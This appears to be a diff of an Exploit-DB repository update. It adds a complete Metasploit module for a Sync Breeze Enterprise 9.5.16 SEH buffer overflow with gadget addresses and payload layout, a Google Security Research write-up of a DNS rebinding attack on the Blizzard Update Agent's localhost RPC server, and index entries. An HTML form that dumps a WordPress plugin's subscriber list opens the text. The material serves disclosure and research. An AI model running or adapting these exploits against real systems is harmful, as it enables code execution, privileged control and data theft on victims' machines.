<form action="http://DOMAINTOTEST.com/?es=export" method="post">
<input type="text" name="option" value="view_all_subscribers" />
<input type="submit" value="Exploit" />
</form>

75
exploits/windows/local/43875.rb Executable file
View file

@ -0,0 +1,75 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
'Description' => %q(
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
by using the import command option to import a specially crafted xml file.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'References' =>
[
[ 'CVE', '2017-7310' ],
[ 'EDB', '41773' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
'StackAdjustment' => -3500
},
'Targets' =>
[
['Windows Universal', { 'Ret' => 0x10015FFE } ]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 29 2017',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
])
end
def exploit
jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll
esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
jmp = "\xFF\xE0" # JMP ESP
buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
buffer << "\x90" * 1536
buffer << jmpesp
buffer << "\x90" * 18
buffer << esp
buffer << jmp
buffer << "\x90" * 68
buffer << generate_seh_record(target.ret)
buffer << "\x90" * 10
buffer << payload.encoded
buffer << "\x90" * 5000
buffer << "\n</classify>"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end
end

53
exploits/windows/local/43879.txt Normal file
View file

@ -0,0 +1,53 @@
All blizzard games are installed alongside a shared tool called "Blizzard Update Agent", investor.activision.com claims they have "500 million monthly active users", who presumably all have this utility installed.
The agent utility creates an JSON RPC server listening on localhost port 1120, and accepts commands to install, uninstall, change settings, update and other maintenance related options. Blizzard use a custom authentication scheme to verify the rpc's are from a legitimate source, it looks like this:
$ curl -si http://localhost:1120/agent
HTTP/1.0 200 OK
Content-Length: 359
{
"pid" : 3140.000000,
"user_id" : "S-1-5-21-1613814707-140385463-2225822625-1000",
"user_name" : "S-1-5-21-1613814707-140385463-2225822625-1000",
"state" : 1004.000000,
"version" : "2.13.4.5955",
"region" : "us",
"type" : "retail",
"opt_in_feedback" : true,
"session" : "15409717072196133548",
"authorization" : "11A87920224BD1FB22AF5F868CA0E789"
}
This endpoint is permitted without authentication, but all other requests must have a valid "Authorization" header with the token in that response. As with all HTTP RPC schemes like this, a website can send requests to the daemon with XMLHttpRequest(), but I think the theory is they will be ignored because requests must prove they can read and write the authorization property.
I don't think this design will work because of an attack called "dns rebinding". Any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost.
To be clear, this means that *any* website can send privileged commands to the agent.
I have a domain I use for testing called rbndr.us, you can use this page to generate hostnames:
https://lock.cmpxchg8b.com/rebinder.html
Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 199.241.29.227
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
Here you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch, the TTL is set to minimum but some servers round up).
I just wait for the cached response to expire, and then POST commands to the server.
Exploitation would involve using network drives, or setting destination to "Downloads" and making the browser install dlls, datafiles, etc.
I made a very simple demo, I'm sure it's quite brittle, but hopefully you get the idea!
http://lock.cmpxchg8b.com/yah4od7N.html
See screenshot attached of how it's supposed to look.
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43665.zip

22
files_exploits.csv
View file

@ -5259,7 +5259,7 @@ id,file,description,date,author,type,platform,port
43780,exploits/macos/dos/43780.c,"macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability'",2018-01-19,"Google Security Research",dos,macos,
43826,exploits/windows/dos/43826.txt,"Peercast < 0.1211 - Format String",2015-05-28,"GulfTech Security",dos,windows,
43854,exploits/windows/dos/43854.py,"MixPad 5.00 - Buffer Overflow",2018-01-23,bzyo,dos,windows,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa",dos,hardware,
43856,exploits/hardware/dos/43856.py,"RAVPower 2.000.056 - Memory Disclosure",2018-01-23,"Daniele Linguaglossa & Stefano Farletti",dos,hardware,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -9004,7 +9004,7 @@ id,file,description,date,author,type,platform,port
38817,exploits/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",local,linux,
38832,exploits/linux/local/38832.py,"RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation",2015-12-01,rebel,local,linux,
38835,exploits/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,local,multiple,
38847,exploits/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",local,windows,
38847,exploits/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa & Stefano Farletti",local,windows,
38871,exploits/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,local,windows,
38903,exploits/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,
38904,exploits/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,
@ -9172,6 +9172,9 @@ id,file,description,date,author,type,platform,port
43816,exploits/windows/local/43816.txt,"dbPowerAmp < 2.0/10.0 - Buffer Overflow",2014-09-27,"GulfTech Security",local,windows,
43817,exploits/windows/local/43817.txt,"PsychoStats < 2.2.4 Beta - Cross Site Scripting",2014-12-22,"GulfTech Security",local,windows,
43857,exploits/windows/local/43857.py,"HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation",2018-01-23,"Peter Lapp",local,windows,
43875,exploits/windows/local/43875.rb,"Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow (Metasploit)",2018-01-24,Metasploit,local,windows,
43878,exploits/multiple/local/43878.md,"Oracle VirtualBox < 5.1.30 / < 5.2-rc1 - Guest to Host Escape",2018-01-24,SecuriTeam,local,multiple,
43879,exploits/windows/local/43879.txt,"Blizzard Update Agent - JSON RPC DNS Rebinding",2018-01-23,"Google Security Research",local,windows,1120
40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows,
40540,exploits/windows/local/40540.txt,"NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
40541,exploits/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,local,windows,
@ -9403,7 +9406,7 @@ id,file,description,date,author,type,platform,port
42454,exploits/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Local Privilege Escalation",2017-08-14,Securify,local,macos,
42455,exploits/windows/local/42455.py,"ALLPlayer 7.4 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows,
42456,exploits/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Local Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,local,windows,
42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa",local,osx,
42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa & Stefano Farletti",local,osx,
42521,exploits/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Local Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",local,windows,
42536,exploits/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows,
42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Code Execution",2017-08-21,"Daniele Votta",local,windows,
@ -15123,7 +15126,7 @@ id,file,description,date,author,type,platform,port
34622,exploits/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",remote,windows,
34647,exploits/windows/remote/34647.txt,"Ammyy Admin 3.5 - Remote Code Execution (Metasploit)",2014-09-13,scriptjunkie,remote,windows,
34654,exploits/windows/remote/34654.c,"SWiSH Max3 - DLL Loading Arbitrary Code Execution",2010-09-20,anT!-Tr0J4n,remote,windows,
34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",remote,windows,80
34668,exploits/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa & Stefano Farletti",remote,windows,80
34669,exploits/multiple/remote/34669.rb,"Railo 4.2.1 - Remote File Inclusion (Metasploit)",2014-09-15,Metasploit,remote,multiple,80
34670,exploits/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload (Metasploit)",2014-09-15,Metasploit,remote,multiple,8400
34671,exploits/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass (Metasploit)",2014-09-15,Metasploit,remote,java,9000
@ -15760,7 +15763,7 @@ id,file,description,date,author,type,platform,port
39735,exploits/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload (Metasploit)",2016-04-26,Metasploit,remote,windows,80
39736,exploits/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",remote,linux,
39742,exploits/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",remote,php,
39755,exploits/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa",remote,windows,
39755,exploits/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa & Stefano Farletti",remote,windows,
39756,exploits/linux/remote/39756.rb,"Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-05-02,Metasploit,remote,linux,8080
39783,exploits/windows/remote/39783.py,"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,remote,windows,
39792,exploits/ruby/remote/39792.rb,"Ruby on Rails - Development Web Console (v2) Code Execution (Metasploit)",2016-05-09,Metasploit,remote,ruby,3000
@ -15833,6 +15836,9 @@ id,file,description,date,author,type,platform,port
43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,
43665,exploits/multiple/remote/43665.md,"Transmission - RPC DNS Rebinding",2018-01-11,"Google Security Research",remote,multiple,9091
43693,exploits/hardware/remote/43693.txt,"Master IP CAM 01 - Multiple Vulnerabilities",2018-01-17,"Raffaele Sabato",remote,hardware,
43871,exploits/hardware/remote/43871.py,"RAVPower 2.000.056 - Root Remote Code Execution",2018-01-24,"Daniele Linguaglossa & Stefano Farletti",remote,hardware,
43876,exploits/php/remote/43876.rb,"Kaltura - Remote PHP Code Execution over Cookie (Metasploit)",2018-01-24,Metasploit,remote,php,
43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server - 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,
40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471
@ -31900,7 +31906,7 @@ id,file,description,date,author,type,platform,port
31164,exploits/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' SQL Injection",2008-02-12,S@BUN,webapps,php,
31258,exploits/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,webapps,ios,
31335,exploits/php/webapps/31335.txt,"MG2 - 'list' Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",webapps,php,
40357,exploits/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",webapps,hardware,80
40357,exploits/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa & Stefano Farletti",webapps,hardware,80
31700,exploits/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,webapps,php,
31701,exploits/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Cross-Site Scripting",2008-04-24,ZoRLu,webapps,php,
31173,exploits/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",webapps,php,80
@ -34101,7 +34107,7 @@ id,file,description,date,author,type,platform,port
34849,exploits/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Local/Remote File Inclusion",2010-01-19,indoushka,webapps,php,
34850,exploits/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,webapps,php,
34851,exploits/php/webapps/34851.txt,"Bacula-Web 5.2.10 - 'joblogs.php?jobid' SQL Injection",2014-10-02,wishnusakti,webapps,php,80
34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",webapps,windows,80
34852,exploits/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa & Stefano Farletti",webapps,windows,80
34854,exploits/php/webapps/34854.txt,"WordPress Plugin All In One WP Security & Firewall 3.8.3 - Persistent Cross-Site Scripting",2014-10-02,Vulnerability-Lab,webapps,php,80
34858,exploits/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - Cross-Site Request Forgery",2014-10-02,"Krusty Hack",webapps,php,80
34861,exploits/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,webapps,php,80
@ -37260,6 +37266,8 @@ id,file,description,date,author,type,platform,port
43867,exploits/php/webapps/43867.html,"Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2018-01-23,"Ihsan Sencan",webapps,php,
43868,exploits/php/webapps/43868.txt,"Quickad 4.0 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43870,exploits/php/webapps/43870.txt,"Professional Local Directory Script 1.0 - SQL Injection",2018-01-24,"Ihsan Sencan",webapps,php,
43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,
40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,

Can't render this file because it is too large.